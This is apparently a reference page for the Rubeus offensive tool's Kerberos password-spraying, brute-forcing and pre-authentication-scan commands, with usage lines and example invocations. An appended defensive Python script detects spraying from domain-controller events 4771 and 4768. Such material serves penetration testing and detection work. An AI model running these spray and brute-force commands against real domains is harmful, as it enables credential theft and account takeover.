brute / spray
Kerberos-based password brute-forcing or password spraying. Can also be invoked as spray.
Usage
Rubeus.exe brute </password:<password> | /passwords:<passwords-file>> [/user:<username> | /users:<users-file>] [/domain:<domain>] [/creduser:<domain>\<username> & /credpassword:<password>] [/ou:OU=...] [/dc:<dc-ip>] [/outfile:<output>] [/noticket] [/verbose] [/nowrap]
Options
- /password:<password> - single password to test
- /passwords:<file> - file containing passwords, one per line
- /user:<username> - single user to test
- /users:<file> - file containing usernames, one per line
- /domain:<domain> - target domain (defaults to current)
- /dc:<dc-ip> - domain controller to target
- /creduser:<domain>\<username> - alternate LDAP credentials for user enumeration
- /credpassword:<password> - password for alternate credentials
- /ou:OU=... - restrict to specific OU
- /outfile:<output> - file to write successful credentials to
- /noticket - don't display/save TGTs on success
- /verbose - show all attempts including failures
- /nowrap - don't line-wrap base64 output
Examples
# Spray a single password across all users in domain
Rubeus.exe brute /password:<password> /noticket
# Spray against a user list
Rubeus.exe brute /password:<password> /users:users.txt /domain:<domain> /dc:<dc-ip>
# Brute-force a specific user
Rubeus.exe brute /user:<username> /passwords:wordlist.txt /domain:<domain>
# With alternate creds for LDAP enumeration
Rubeus.exe brute /password:<password> /creduser:<domain>\<username> /credpassword:<password>
# Save successful creds
Rubeus.exe brute /password:<password> /outfile:<output>
preauthscan
Scan for accounts that do not require Kerberos pre-authentication (AS-REP roastable):
Rubeus.exe preauthscan /users:<users-file> [/domain:<domain>] [/dc:<dc-ip>] [/proxyurl:https://KDC_PROXY/kdcproxy]
# Example
Rubeus.exe preauthscan /users:users.txt /domain:<domain> /dc:<dc-ip>
Notes
- Blocked/disabled accounts are detected and skipped
- On success, a TGT is returned for the valid credential
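Detection side of the brute / spray behaviour above, as an added example (not part of Rubeus or of the original page): Kerberos password spraying shows up on the domain controller as pre-authentication failures (Security event 4771, status 0x18) from one source against many accounts, with a successful TGT request (event 4768, status 0x0) for any account whose password matched. The record layout, the sample events, and the `min_users` and `window` thresholds are constructed assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, reduced to the fields used here:
# (time, EventID, TargetUserName, IpAddress, Status) of Security events 4771/4768.
EVENTS = [
    ("2024-05-01T09:00:01", 4771, "alice", "10.0.0.50", "0x18"),
    ("2024-05-01T09:00:02", 4771, "bob",   "10.0.0.50", "0x18"),
    ("2024-05-01T09:00:03", 4768, "carol", "10.0.0.50", "0x0"),
    ("2024-05-01T09:00:04", 4771, "dave",  "10.0.0.50", "0x18"),
    ("2024-05-01T09:00:05", 4771, "erin",  "10.0.0.50", "0x18"),
    # One user mistyping a password and then logging on: not a spray.
    ("2024-05-01T09:10:00", 4771, "frank", "10.0.0.77", "0x18"),
    ("2024-05-01T09:10:20", 4771, "frank", "10.0.0.77", "0x18"),
    ("2024-05-01T09:10:40", 4768, "frank", "10.0.0.77", "0x0"),
]


def detect_spray(events, min_users=4, window=timedelta(minutes=5)):
    """Flag source IPs whose bad-password pre-auth failures (4771, 0x18) hit
    at least min_users distinct accounts inside one window, and list accounts
    that obtained a TGT (4768, 0x0) from that IP in the same window."""
    fails, oks = defaultdict(list), defaultdict(list)
    for ts, event_id, user, ip, status in sorted(events):
        t = datetime.fromisoformat(ts)
        if event_id == 4771 and status == "0x18":
            fails[ip].append((t, user))
        elif event_id == 4768 and status == "0x0":
            oks[ip].append((t, user))

    findings = {}
    for ip, rows in fails.items():
        start = 0
        for end, (t_end, _) in enumerate(rows):
            while t_end - rows[start][0] > window:  # slide the window forward
                start += 1
            users = {u for _, u in rows[start:end + 1]}
            if len(users) >= min_users:
                t0 = rows[start][0]
                hit = {u for t, u in oks[ip] if t0 <= t <= t0 + window}
                entry = findings.setdefault(ip, {"failed": set(), "succeeded": set()})
                entry["failed"] |= users
                entry["succeeded"] |= hit  # accounts to reset and investigate
    return findings


if __name__ == "__main__":
    for ip, entry in detect_spray(EVENTS).items():
        print(ip, sorted(entry["failed"]), sorted(entry["succeeded"]))
```

Accounts in `succeeded` are the ones for which the sprayed password was valid, so they are the priority for credential reset and session review.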